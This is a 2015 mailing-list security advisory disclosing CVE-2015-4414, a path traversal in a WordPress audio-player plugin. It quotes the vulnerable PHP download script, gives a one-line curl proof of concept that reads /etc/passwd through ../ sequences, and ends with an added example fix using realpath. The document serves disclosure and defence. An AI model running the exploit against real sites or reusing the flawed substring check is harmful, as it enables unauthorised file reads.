Message-id: <B8A5631A-C79C-414C-9067-CBF344C92B07@me.com>
Date: Wed, 10 Jun 2015 16:59:05 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0

Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-06
Advisory: http://www.vapid.dhs.org/advisory.php?v=124
Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/
Vendor: https://profiles.wordpress.org/sedevelops/
Vendor Notified: 2015-06-06
Vendor Contact: https://profiles.wordpress.org/sedevelops/

Description:
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.

Vulnerability:
The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path; it only attempts to check if the path is in /wp-content/uploads, which is easily defeated with ../. This vulnerability doesn't require authentication to the Wordpress site.

File ./se-html5-album-audio-player/download_audio.php:

<?php
$file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file'];
$is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/');
// make sure it's a file before doing anything!
if( is_file($file_name) && $is_in_uploads_dir !== false ) {

    // required for IE
    if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off'); }

    // get the file mime type using the file extension
    switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
        case 'pdf': $mime = 'application/pdf'; break;
        case 'zip': $mime = 'application/zip'; break;
        case 'jpeg':
        case 'jpg': $mime = 'image/jpg'; break;
        default: $mime = 'application/force-download';
    }
    header('Pragma: public'); // required
    header('Expires: 0'); // no cache
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
    header('Cache-Control: private',false);
    header('Content-Type: '.$mime);
    header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: '.filesize($file_name)); // provide file size
    header('Connection: close');
    readfile($file_name); // push it out
    exit();
}

The above code does not verify if a user is logged in, nor does it do proper sanity checking of whether the file is outside of the uploads directory.

CVEID: CVE-2015-4414
OSVDB:

Exploit Code:

$ curl http://www.vapidlabs.com/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
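The substring check in the plugin passes any path that merely contains the string /wp-content/uploads/, so it says nothing about where the path finally resolves. The following is an added example, not the plugin's or the author's code, of how the check can be done on the canonical path instead; the function name safe_upload_path() and the fixed uploads location under DOCUMENT_ROOT are assumptions for illustration.

```php
<?php
// Added example (not from the plugin): replace the strpos() substring test
// with a prefix check on the realpath()-canonicalised file path.

// Returns the canonical absolute path of the requested file only if it is a
// regular file located inside the uploads directory; otherwise returns null.
function safe_upload_path(string $document_root, string $requested): ?string
{
    // Canonicalise the allowed base directory once (this also resolves
    // symlinks, so the later comparison is against real locations).
    $uploads_base = realpath($document_root . '/wp-content/uploads');
    if ($uploads_base === false) {
        return null; // uploads directory missing or unreadable
    }

    // Refuse embedded NUL bytes: filesystem calls would otherwise operate
    // on a silently truncated path.
    if (strpos($requested, "\0") !== false) {
        return null;
    }

    // Resolve the user-supplied value relative to DOCUMENT_ROOT, as the
    // plugin does, but collapse "../" segments and symlinks BEFORE any
    // comparison is made. realpath() returns false for non-existent paths.
    $candidate = realpath($document_root . '/' . ltrim($requested, '/'));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }

    // Compare against the canonical base plus a trailing separator, so a
    // sibling directory such as ".../uploads-other/" cannot match.
    $prefix = $uploads_base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return $candidate;
}

// Usage sketch for the plugin's entry point. Access control is a separate
// fix: if the script bootstraps WordPress, is_user_logged_in() can gate
// the download before any path handling happens.
$path = safe_upload_path($_SERVER['DOCUMENT_ROOT'], $_GET['file'] ?? '');
if ($path === null) {
    http_response_code(404);
    exit();
}
// ... send headers and readfile($path) as before, using $path only.
```

With this check, a request such as /wp-content/uploads/../../../../../etc/passwd canonicalises to /etc/passwd, fails the prefix comparison, and is rejected.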